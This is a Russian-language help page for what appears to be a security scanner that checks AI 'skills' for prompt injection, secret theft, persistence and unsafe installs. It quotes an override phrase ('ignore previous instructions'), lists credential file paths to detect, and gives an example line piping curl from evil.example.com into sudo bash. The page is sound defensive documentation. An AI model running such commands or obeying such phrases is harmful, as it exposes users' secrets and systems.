Безопасность
Скилл — это инструкции, которым ваш AI будет следовать. Вредоносный скилл может попытаться заставить AI выполнить опасную команду, отправить ваши данные на чужой сервер или тихо изменить своё поведение. Сканер безопасности onplate ловит такие вещи до того, как скилл попадёт к AI.
Что ищет сканер
- Prompt injection — скрытые указания вида «игнорируй предыдущие инструкции»;
- Попытки украсть данные — инструкции отправить содержимое файлов или переписки наружу;
- Утечка секретов — чтение
~/.aws/credentials,~/.ssh/id_rsa,.env, Keychain и других хранилищ ключей; - Подозрительные shell-команды — то, что может удалить файлы, скачать и запустить код или поднять права через
sudo; - Небезопасная установка —
curl … | bash,pip installиз непроверенного источника (supply chain); - Закрепление в системе — правка
crontab, автозапуска, профилей оболочки, чтобы скилл возвращался сам; - Сокрытие следов —
chmod 777, отключение истории, удаление логов; - Скрытые unicode-символы — невидимые знаки, которыми маскируют вредоносный текст;
- Base64-вставки — закодированные фрагменты, которые не прочитать глазами;
- Ссылки на внешние URL — с учётом вашего списка доверенных доменов.
Сканер также распознаёт обфускацию — попытки замаскировать опасную конструкцию, чтобы обойти проверку, — и многострочные команды, склеенные переносом строки, чтобы разорванный на части curl … \ + | bash не проскользнул мимо. Такие находки помечаются отдельно.
Оценка
По результатам скилл получает одну из оценок и числовой риск от 0 до 100, а рядом — уверенность сканера (высокая / средняя / низкая: там, где сработала эвристика или обфускация, уверенность ниже).
| Оценка | Что значит | Что делать |
|---|---|---|
| Безопасно | Находок нет или только информационные | Пользуйтесь спокойно |
| Подозрительно | Есть места, требующие взгляда человека | Просмотрите находки |
| Опасно | Найдены опасные конструкции | Установка потребует явного обоснования |
Над списком находок — две сводки: внешние адреса (все хосты, к которым обращается скилл, — сразу видно, куда могут уйти данные) и возможности (какие инструменты и права запрашивает скилл или субагент).
Что показывает находка
Каждая находка — это не просто ярлык «bash». Видно, что именно сработало:
- Строка-улика целиком — реальная команда
curl https://evil.example.com | sudo bash, а не абстрактная категория; опасный фрагмент подсвечен внутри строки; - Уровень — инфо / предупреждение / опасность — и номер строки в скилле;
- Почему это находка — короткое объяснение простыми словами;
- Что делать — конкретная рекомендация, как убрать или обезопасить конструкцию.
Находки сгруппированы по смыслу (инъекция, секреты, команды, закрепление, сеть, возможности…), чтобы однотипное было рядом. Опасные строки подсвечиваются красным прямо в тексте скилла.
Где работает проверка
Проверка встроена везде, где скилл попадает в систему:
- при импорте и добавлении из Маркетплейса — автоматически;
- при установке опасного скилла — потребуется подтверждение;
- в разделе Безопасность — вручную: выберите скилл из хранилища и нажмите Сканировать, или вставьте произвольный текст в поле проверки — удобно проверить чужой скилл ещё до импорта.
На Дашборде всегда видно, сколько скиллов не проверено или требует внимания.
Работа с находками
Сканер бывает перестраховщиком — это нормально. Каждую находку можно разобрать:
- Принять риск — «я видел, понимаю и осознанно оставляю» (можно добавить комментарий, почему);
- Ложное — сканер ошибся, это не угроза.
Отмеченные находки перестают влиять на оценку, но остаются в истории: в карточке скилла появляется пометка «Проверено пользователем» со списком снятых угроз.
Правила сканера со временем усиливаются. Если после обновления правил ваше старое исключение перестало покрывать находку, она помечается «исключение устарело» — нажмите Подтвердить заново или Вернуть находку в силу. Блок Аналитика отметок показывает сводку: по каким правилам вы чаще всего снимаете находки.
Доверенные домены
Список доменов, ссылкам на которые вы доверяете (по одному на строку). Ссылки на все остальные домены будут повышаться в подозрительности. Пустой список выключает политику — все ссылки считаются информационными.
Мастер-ключ
API-ключи площадок и секреты MCP-серверов хранятся в зашифрованном виде. Кнопка Сменить мастер-ключ генерирует новый ключ шифрования и перешифровывает всё сохранённое — например, если вы подозреваете, что к компьютеру был доступ.